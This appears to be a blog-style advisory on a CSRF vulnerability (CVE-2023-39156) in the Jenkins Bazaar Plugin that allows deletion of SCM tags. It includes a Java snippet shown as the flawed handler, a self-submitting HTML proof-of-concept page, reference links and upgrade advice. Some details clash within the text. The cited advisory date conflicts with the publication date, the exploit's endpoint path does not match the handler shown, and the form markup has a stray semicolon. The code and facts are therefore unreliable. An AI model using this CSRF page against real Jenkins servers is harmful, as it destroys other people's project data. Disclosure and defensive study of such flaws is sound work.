The Jenkins Bazaar Plugin (versions 1.22 and earlier) has been identified with having a cross-site request forgery (CSRF) vulnerability, allowing attackers to maliciously delete previously created Bazaar Source Control Management (SCM) tags without proper permissions. This post aims to provide an in-depth explanation of the issue, including a code snippet showcasing the vulnerability, links to the original references, and details on the exploit. If you are a user of Jenkins Bazaar Plugin, you should take immediate action to mitigate this security risk.
Background on Jenkins Bazaar Plugin
The Jenkins Bazaar Plugin is an integration between the open-source Jenkins continuous integration (CI) tool and the Bazaar version control system. The plugin allows users to manage and automate their software development lifecycle using Bazaar as their source code repository. The issue affects Bazaar Plugin version 1.22 and earlier. The Bazaar version control system itself is not affected by the vulnerability.
Vulnerability Details - CVE-2023-39156
A cross-site request forgery (CSRF) vulnerability exists in Jenkins Bazaar Plugin 1.22 and earlier, specifically in the 'BazaarSCM.java' file. The vulnerability allows attackers to exploit the lack of CSRF protection, enabling them to delete previously created Bazaar SCM tags without the appropriate permissions.
Here's a code snippet from the vulnerable 'BazaarSCM.java' file
public HttpResponse doDeleteTag(@QueryParameter String tag) {
BazaarTag toDelete = null;
for (Iterator<BazaarTag> iterator = tags.iterator(); iterator.hasNext();)
{
BazaarTag t = iterator.next();
if (t.getTagName().equals(tag)) {
toDelete = t;
iterator.remove();
break;
}
}
save();
return toDelete == null ? HttpResponses.error(HttpServletResponse.SC_NOT_FOUND, "No such tag") : HttpResponses.ok();
}
Exploit Details
An attacker can create a malicious web page that, when visited by a logged-in Jenkins user with permissions to manage Bazaar SCM tags, will execute a request to delete a targeted tag. The attack will look like a legitimate request, despite originating from a different domain, due to the lack of CSRF protection in the Bazaar Plugin.
As an example, the following HTML snippet could be used to execute the CSRF attack
<!DOCTYPE html>
<html>
<head>
<title>Exploiting Jenkins Bazaar Plugin CSRF Vulnerability</title>
<script>
function submitForm() {
var form = document.getElementById("csrfExploitForm");
form.submit();
}
</script>
</head>
<body onload="submitForm()">
<form id="csrfExploitForm" action="https://your.jenkins.instance/plugin/bazaar/tag/delete"; method="POST">
<input type="hidden" name="tag" value="target-tag-to-delete"/>
</form>
</body>
</html>
For more information on this vulnerability, refer to the following sources
1. Jenkins Security Advisory 2023-04-18: https://www.jenkins.io/security/advisory/2023-04-18/
2. CVE-2023-39156: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39156
3. National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2023-39156
Mitigation
As a Jenkins Bazaar Plugin user, it is highly recommended to update your plugin to version 1.23 or later, which addresses the CSRF vulnerability. In addition, enabling CSRF protection in Jenkins can help guard against CSRF attacks in general. More information on CSRF protection in Jenkins can be found here: https://www.jenkins.io/doc/book/security/csrf-protection/.
Conclusion
This post has outlined the details of the CSRF vulnerability found in Jenkins Bazaar Plugin 1.22 and earlier, which allows attackers to delete Bazaar SCM tags without proper permissions. It is crucial to take immediate action to mitigate the security risk posed by this vulnerability and keep your systems secure.
Timeline
Published on: 07/26/2023 14:15:00 UTC
Last modified on: 08/01/2023 20:31:00 UTC